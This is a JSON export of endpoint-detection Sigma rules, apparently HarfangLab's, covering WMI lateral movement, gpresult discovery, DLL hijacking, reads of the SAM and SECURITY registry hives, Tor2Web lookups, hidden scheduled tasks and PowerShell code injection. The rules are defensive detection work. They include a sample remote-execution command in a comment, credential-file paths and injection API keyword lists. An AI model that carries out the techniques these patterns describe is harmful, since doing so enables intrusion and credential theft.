"content": "title: Remote Execution via WMI\nid: 87f583d1-ca80-4cc4-bd29-8bb2d2fced2f\ndescription: |\n Detects the usage of wmic.exe to launch executables remotely.\n This can be used by an attacker to move laterally within an organisation or by an evil macro to execute further processes on the machine.\n It is recommended to analyze processes launched remotely by WMI to look for malicious content or actions, and to look for further compromised machines by looking for lateral movement-related alerts following this one.\nreferences:\n - https://www.microsoft.com/en-us/security/blog/2023/05/24/volt-typhoon-targets-us-critical-infrastructure-with-living-off-the-land-techniques/\n - https://docs.microsoft.com/en-us/windows/win32/wmisdk/wmic\n - https://attack.mitre.org/techniques/T1047/\n - https://attack.mitre.org/techniques/T1021/006/\ndate: 2021/04/01\nmodified: 2025/04/11\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1047\n - attack.lateral_movement\n - attack.t1021.006\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Lateralization\nlogsource:\n category: process_creation\n product: windows\ndetection:\n # wmic.exe /node:\"192.168.0.1\" process call create evil.exe\n selection_bin:\n - Image|endswith: '\\wmic.exe'\n - OriginalFileName: 'wmic.exe'\n\n selection_cmd:\n CommandLine|all:\n - '*process *call *create*'\n - '*node:*'\n condition: all of selection_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "87f583d1-ca80-4cc4-bd29-8bb2d2fced2f",
"rule_name": "Remote Execution via WMI",
"rule_description": "Detects the usage of wmic.exe to launch executables remotely.\nThis can be used by an attacker to move laterally within an organisation or by an evil macro to execute further processes on the machine.\nIt is recommended to analyze processes launched remotely by WMI to look for malicious content or actions, and to look for further compromised machines by looking for lateral movement-related alerts following this one.\n",
"rule_creation_date": "2021-04-01",
"rule_modified_date": "2025-04-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1021.006",
"attack.t1047"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "884695e9-882c-429d-b67b-6821402eab76",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.606131Z",
"creation_date": "2026-03-23T11:45:34.606135Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.606142Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf",
"https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/gpresult",
"https://unit42.paloaltonetworks.com/emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve/",
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1615/T1615.md#atomic-test-1---display-group-policy-information-via-gpresult",
"https://attack.mitre.org/techniques/T1615/"
],
"name": "t1615_group_policy_discovery_gpresult.yml",
"content": "title: Group Policy Information Discovered via gpresult.exe\nid: 884695e9-882c-429d-b67b-6821402eab76\ndescription: |\n Detects an access to a group policy information using gpresult.\n Adversaries may gather information on Group Policy settings to identify paths for privilege escalation, security measures applied within a domain, and to discover patterns in domain objects that can be manipulated or used to blend in the environment.\n It is recommended to investigate the execution context of gpresult, as well as to look for other type of malicious behavior on the target host.\nreferences:\n - https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf\n - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/gpresult\n - https://unit42.paloaltonetworks.com/emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve/\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1615/T1615.md#atomic-test-1---display-group-policy-information-via-gpresult\n - https://attack.mitre.org/techniques/T1615/\ndate: 2022/12/26\nmodified: 2025/02/05\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1615\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n - Image|endswith: '\\gpresult.exe'\n - OriginalFileName: 'gprslt.exe'\n\n selection_commandline:\n CommandLine|contains:\n - '/z' # works with not space between command and argument\n - ' -z'\n\n exclusion_dickinson:\n GrandparentImage: '?:\\Program Files (x86)\\Becton Dickinson\\EpiPreUpgrade\\EpiPreUpgrade.exe'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "884695e9-882c-429d-b67b-6821402eab76",
"rule_name": "Group Policy Information Discovered via gpresult.exe",
"rule_description": "Detects an access to a group policy information using gpresult.\nAdversaries may gather information on Group Policy settings to identify paths for privilege escalation, security measures applied within a domain, and to discover patterns in domain objects that can be manipulated or used to blend in the environment.\nIt is recommended to investigate the execution context of gpresult, as well as to look for other type of malicious behavior on the target host.\n",
"rule_creation_date": "2022-12-26",
"rule_modified_date": "2025-02-05",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1615"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "885916e7-ab33-491d-b06d-d054d6ba15e6",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.586776Z",
"creation_date": "2026-03-23T11:45:34.586780Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.586787Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_tieringengineservice.yml",
"content": "title: DLL Hijacking via tieringengineservice.exe\nid: 885916e7-ab33-491d-b06d-d054d6ba15e6\ndescription: |\n Detects potential Windows DLL Hijacking via tieringengineservice.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'tieringengineservice.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\CLUSAPI.dll'\n - '\\DNSAPI.dll'\n - '\\ESENT.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "885916e7-ab33-491d-b06d-d054d6ba15e6",
"rule_name": "DLL Hijacking via tieringengineservice.exe",
"rule_description": "Detects potential Windows DLL Hijacking via tieringengineservice.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "885df422-ec8e-4f5d-81dc-26e4d816601f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.623783Z",
"creation_date": "2026-03-23T11:45:34.623784Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.623789Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1003/002/",
"https://attack.mitre.org/techniques/T1003/004/"
],
"name": "t1003_registry_access_filesystem.yml",
"content": "title: Sensitive Registry Hive Accessed\nid: 885df422-ec8e-4f5d-81dc-26e4d816601f\ndescription: |\n Detects file accesses to registry hives files.\n Attackers may read registry hives directly from the disk, including backup files.\n This can be indicative of an attempt to access sensitive information stored in registry hives (such as the SAM or the LSA secrets) for credential access.\n It is recommended to investigate the process trying to access the hives for malicious contents.\nreferences:\n - https://attack.mitre.org/techniques/T1003/002/\n - https://attack.mitre.org/techniques/T1003/004/\ndate: 2024/07/03\nmodified: 2025/12/01\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1552.001\n - classification.Windows.Source.Filesystem\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.SensitiveInformation\nlogsource:\n category: filesystem_event\n product: windows\ndetection:\n selection:\n Path|endswith:\n - ':\\Windows\\System32\\config\\SAM'\n - ':\\Windows\\System32\\config\\SECURITY'\n - ':\\Windows\\System32\\config\\RegBack\\SAM'\n - ':\\Windows\\System32\\config\\RegBack\\SECURITY'\n Kind: 'read'\n Image|contains: '?'\n\n filter_registry:\n ProcessName: 'Registry'\n ProcessParentName: 'System'\n\n filter_registry_missing1:\n ProcessName: 'Registry'\n ProcessSize: 0\n\n filter_registry_missing2:\n ProcessName: 'Registry'\n ProcessSha256: '0000000000000000000000000000000000000000000000000000000000000000'\n\n filter_invalid_path:\n Path|startswith:\n - '?:\\$WINDOWS.~BT\\'\n - '?:\\$WinREAgent\\'\n\n exclusion_programfiles:\n Image|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n exclusion_dism:\n Image:\n - '?:\\Windows\\Temp\\\\????????-????-????-????-????????????\\DismHost.exe'\n - '?:\\Temp\\\\????????-????-????-????-????????????\\DismHost.exe'\n - '?:\\Windows\\System32\\Dism.exe'\n\n exclusion_dism_plus:\n ProcessOriginalFileName: 'Dism++.exe'\n ProcessCompany: 'Chuyu Team'\n ProcessProduct: 'Dism++'\n\n exclusion_sources:\n Image: '?:\\$WINDOWS.~BT\\Sources\\SetupPlatform.exe'\n\n exclusion_windows_bin:\n Image:\n - '?:\\Windows\\System32\\SrTasks.exe'\n - '?:\\Windows\\System32\\ntdsutil.exe'\n\n exclusion_defender:\n ProcessImage:\n - '?:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\\\*\\MsMpEng.exe'\n - '?:\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection\\Platform\\\\*\\MsSense.exe'\n ProcessSignature :\n - 'Microsoft Windows Publisher'\n - 'Microsoft Corporation'\n ProcessSigned: 'true'\n\n exclusion_vssvc:\n Image: '?:\\Windows\\System32\\VSSVC.exe'\n\n exclusion_sppcreation:\n ProcessCommandLine: '?:\\Windows\\system32\\rundll32.exe /d srrstr.dll,ExecuteScheduledSPPCreation'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_svchost:\n ProcessCommandLine:\n - '?:\\WINDOWS\\system32\\svchost.exe -k LocalSystemNetworkRestricted*'\n - '?:\\windows\\system32\\svchost.exe -k sysmain*'\n - '?:\\Windows\\system32\\svchost.exe -k wsappx*'\n - '?:\\Windows\\system32\\svchost.exe -k defragsvc'\n\n exclusion_rundll:\n ProcessCommandLine: '?:\\Windows\\system32\\rundll32.exe aepdu.dll,AePduRunUpdate'\n ProcessParentImage: '?:\\Windows\\system32\\services.exe'\n\n exclusion_taskhost:\n Image:\n - '?:\\Windows\\System32\\taskhostw.exe'\n - '?:\\Windows\\System32\\taskhost.exe'\n - '?:\\Windows\\WinSxS\\\\*\\taskhost.exe'\n\n exclusion_vmcompute:\n Image: '?:\\Windows\\System32\\vmwp.exe'\n ProcessParentImage: '?:\\Windows\\System32\\vmcompute.exe'\n ProcessGrandparentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_winsat:\n Image: '?:\\Windows\\System32\\WinSAT.exe'\n ProcessParentCommandLine: '?:\\WINDOWS\\system32\\rundll32.exe sysmain.dll,PfSvWsSwapAssessmentTask'\n\n exclusion_wbengine:\n Image: '?:\\Windows\\System32\\wbengine.exe'\n\n exclusion_wmiprvse:\n Image: '?:\\Windows\\System32\\wbem\\WmiPrvSE.exe'\n\n exclusion_docker:\n Image: '?:\\Windows\\System32\\dockerd.exe'\n\n exclusion_bitdefender:\n Image|endswith: '\\Bitdefender\\Endpoint Security\\EPSecurityService.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Bitdefender SRL'\n\n exclusion_trendmicro:\n ProcessProcessName:\n - 'TmCCSF.exe'\n # C:\\Program Files (x86)\\Trend Micro\\Security Agent\\Ntrtscan.exe\n - 'Ntrtscan.exe'\n - 'coreServiceShell.exe' # C:\\Program Files\\Trend Micro\\AMSP\\coreServiceShell.exe\n - 'TMBMSRV.exe' # C:\\Program Files (x86)\\Trend Micro\\BM\\TMBMSRV.exe\n ProcessSigned: 'true'\n ProcessSignature: 'Trend Micro, Inc.'\n\n exclusion_dllhost:\n # Used when copy file from explorer when UAC is enabled\n ProcessImage: '?:\\Windows\\system32\\DllHost.exe'\n ProcessCommandLine: '?:\\Windows\\system32\\DllHost.exe /Processid:{3AD05575-8857-4850-9277-11B85BDB8E09}'\n\n exclusion_citrix:\n ProcessImage|endswith: '\\citrix\\provisioning services\\soapserver.exe'\n\n exclusion_hdclone:\n ProcessOriginalFileName: 'hdclone.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Miray Software AG'\n\n exclusion_sophos:\n Image: '?:\\ProgramData\\Sophos\\AutoUpdate\\Cache\\sophos_autoupdate?.dir\\su-repair.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Sophos Limited'\n - 'Sophos Ltd'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "885df422-ec8e-4f5d-81dc-26e4d816601f",
"rule_name": "Sensitive Registry Hive Accessed",
"rule_description": "Detects file accesses to registry hives files.\nAttackers may read registry hives directly from the disk, including backup files.\nThis can be indicative of an attempt to access sensitive information stored in registry hives (such as the SAM or the LSA secrets) for credential access.\nIt is recommended to investigate the process trying to access the hives for malicious contents.\n",
"rule_creation_date": "2024-07-03",
"rule_modified_date": "2025-12-01",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1552.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "885f4356-e788-4be5-8463-3d400a7f4b80",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.602902Z",
"creation_date": "2026-03-23T11:45:34.602906Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.602913Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://resources.infosecinstitute.com/topics/malware-analysis/malware-dark-web/",
"https://attack.mitre.org/techniques/T1090/003",
"https://attack.mitre.org/software/S0183"
],
"name": "t1090_003_tor2web_proxy.yml",
"content": "title: Tor2Web Proxy Network Request\nid: 885f4356-e788-4be5-8463-3d400a7f4b80\ndescription: |\n Detects DNS Requests to domains associated with Tor2Web proxies, such as onion.pw or onion.ws.\n Tor2Web proxies are often used by RaaS (Ransomware As A Service) operators or Botnet networks to communicate with their C&C servers hiding in the Tor Network.\n This gives adversaries an advantage by not integrating Onion routing protocol capabilities while still keeping the C&C server anonymous.\nreferences:\n - https://resources.infosecinstitute.com/topics/malware-analysis/malware-dark-web/\n - https://attack.mitre.org/techniques/T1090/003\n - https://attack.mitre.org/software/S0183\ndate: 2023/10/31\nmodified: 2025/03/31\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1090.003\n - attack.s0183\n - classification.Windows.Source.DnsQuery\n - classification.Windows.Behavior.CommandAndControl\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: dns_query\ndetection:\n selection:\n QueryName|contains:\n - 'onion.ws'\n - 'onion.pw'\n\n condition: selection\nlevel: high\n#level: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "885f4356-e788-4be5-8463-3d400a7f4b80",
"rule_name": "Tor2Web Proxy Network Request",
"rule_description": "Detects DNS Requests to domains associated with Tor2Web proxies, such as onion.pw or onion.ws.\nTor2Web proxies are often used by RaaS (Ransomware As A Service) operators or Botnet networks to communicate with their C&C servers hiding in the Tor Network.\nThis gives adversaries an advantage by not integrating Onion routing protocol capabilities while still keeping the C&C server anonymous.\n",
"rule_creation_date": "2023-10-31",
"rule_modified_date": "2025-03-31",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control"
],
"rule_technique_tags": [
"attack.t1090.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "88bbb3c0-be25-4bf1-aac1-0dc8e82f090b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.621859Z",
"creation_date": "2026-03-23T11:45:34.621861Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.621865Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.microsoft.com/security/blog/2022/04/12/tarrask-malware-uses-scheduled-tasks-for-defense-evasion/",
"https://attack.mitre.org/techniques/T1112/",
"https://attack.mitre.org/techniques/T1053/"
],
"name": "t1112_hidden_scheduled_task.yml",
"content": "title: Scheduled Task Security Descriptor Deleted\nid: 88bbb3c0-be25-4bf1-aac1-0dc8e82f090b\ndescription: |\n Detects the deletion of a scheduled task's Security Descriptor (SD).\n Attackers often create scheduled tasks on infected systems to achieve persistence.\n To hide the presence of a specific scheduled task, an attacker can delete the SD value within the registry path.\n However, the deletion requires the attacker to run in the context of the SYSTEM user.\n It is recommended to investigate the process at the origin of this registry modification and the scheduled task targeted by the deletion itself to determine the legitimacy of this action.\nreferences:\n - https://www.microsoft.com/security/blog/2022/04/12/tarrask-malware-uses-scheduled-tasks-for-defense-evasion/\n - https://attack.mitre.org/techniques/T1112/\n - https://attack.mitre.org/techniques/T1053/\ndate: 2022/05/05\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1112\n - attack.execution\n - attack.persistence\n - attack.t1053\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: 'DeleteValue'\n TargetObject: 'HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\\\*\\SD'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_panda:\n ProcessImage:\n - '?:\\Program Files (x86)\\Panda Security\\WAC\\PSANHost.exe'\n - '.:\\Program Files (x86)\\Panda Security\\Panda Security Protection\\PSANHost.exe'\n\n exclusion_total_uninstall:\n ProcessImage: '?:\\Program Files\\Total Uninstall *\\Tu.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "88bbb3c0-be25-4bf1-aac1-0dc8e82f090b",
"rule_name": "Scheduled Task Security Descriptor Deleted",
"rule_description": "Detects the deletion of a scheduled task's Security Descriptor (SD).\nAttackers often create scheduled tasks on infected systems to achieve persistence.\nTo hide the presence of a specific scheduled task, an attacker can delete the SD value within the registry path.\nHowever, the deletion requires the attacker to run in the context of the SYSTEM user.\nIt is recommended to investigate the process at the origin of this registry modification and the scheduled task targeted by the deletion itself to determine the legitimacy of this action.\n",
"rule_creation_date": "2022-05-05",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1053",
"attack.t1112"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "88e012a4-b507-4285-acbc-b621ecda222f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.085023Z",
"creation_date": "2026-03-23T11:45:34.085025Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.085029Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1562/001/"
],
"name": "t1562_001_powershell_suspicious_code_injection.yml",
"content": "title: Suspicious Code Injection via PowerShell\nid: 88e012a4-b507-4285-acbc-b621ecda222f\ndescription: |\n Detects the execution of a suspicious PowerShell script containing cmdlets that may perform code injection.\n Attackers may use code injection to inject code into remote processes, aiming for privilege escalation, data theft or defense evasion.\n It is recommended to investigate the PowerShell script in question, check for signs of code injection, review the executed command-line arguments, and analyze the process tree for any suspicious activity.\nreferences:\n - https://attack.mitre.org/techniques/T1562/001/\ndate: 2021/11/23\nmodified: 2025/04/08\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - attack.t1218\n - attack.execution\n - attack.t1106\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.MemoryExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection_dotnet_apis:\n PowershellCommand|contains:\n - 'DefineDynamicAssembly'\n - 'DefineDynamicModule'\n - 'Add-Type'\n - 'GetDelegateForFunctionPointer'\n - \"GetType('Microsoft.Win32.UnsafeNativeMethods')\"\n\n selection_memory_apis:\n PowershellCommand|contains:\n - 'VirtualAlloc'\n - 'VirtualProtect'\n - 'WriteProcessMemory'\n - 'RtlCreateUserThread'\n - 'CreateUserThread'\n - 'CreateThread'\n - 'CreateRemoteThread'\n - 'QueueUserApc'\n\n exclusion_defender_av:\n ProcessCurrentDirectory:\n - '?:\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection\\SenseCM'\n - '?:\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection\\SenseCM\\'\n ProcessCommandLine|contains|all:\n - '?:\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection\\SenseCM\\AntiVirus.psm1'\n - '?:\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection\\SenseCM\\EDR.psm1'\n - '?:\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection\\SenseCM\\PolicyEnforcer.ps1'\n\n exclusion_defender_av2:\n ProcessCurrentDirectory: '?:\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection\\Downloads\\'\n ProcessCommandLine|contains:\n - '?:\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection\\Downloads\\PSScript_*.ps1'\n - '?:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command &'\n\n exclusion_defender_av3:\n PowershellScriptPath: '?:\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection\\SenseCM\\PolicyEnforcer.ps1'\n\n # https://www.powershellgallery.com/packages/dbatools/1.0.135/Content/allcommands.ps1\n exclusion_dbatools:\n PowershellCommand|contains|all:\n - '#.ExternalHelp dbatools-Help.xml'\n - 'function Add-DbaAgDatabase {'\n - 'SLEEP_RETRY_VIRTUALALLOC'\n - 'function Add-DbaAgListener {'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "88e012a4-b507-4285-acbc-b621ecda222f",
"rule_name": "Suspicious Code Injection via PowerShell",
